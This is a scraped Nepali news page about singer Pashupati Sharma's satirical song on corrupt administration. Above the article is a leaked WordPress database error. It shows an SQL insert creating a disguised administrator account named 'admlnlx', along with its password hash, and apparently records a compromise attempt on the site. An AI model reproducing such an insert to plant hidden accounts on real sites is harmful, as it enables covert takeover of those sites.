WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0ErY8.U4jL/ZvvV5gmvnDlPK7xsdS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-19 23:32:01', '', 'admlnlx', 'admlnlx')
काठमाडौं ,माघ १४ –
गायक पशुपति शर्माले व्यङ्ग्यात्मक लोक कमेडी गीत सार्वजनिक गरेका छन् । ‘आर्इज ओइ काल’ बोलको गीतमा स्वरसँगै शब्द तथा संगीत पनि गायक स्वम्कै छन् ।
गीतमा उनले विद्यमान गैर जिम्मेवार प्रशासन तथा भ्रष्टपनलाई चित्रित गरेका छन् । दुर्गा पौडेलले निर्देशन गरेको म्युजिक भिडियोमा पशुपति शर्मासँगै श्रीकृष्ण बम मल्लले अभिनय गरेका छन् ।
https://www.youtube.com/watch?v=w5FlTa59Ras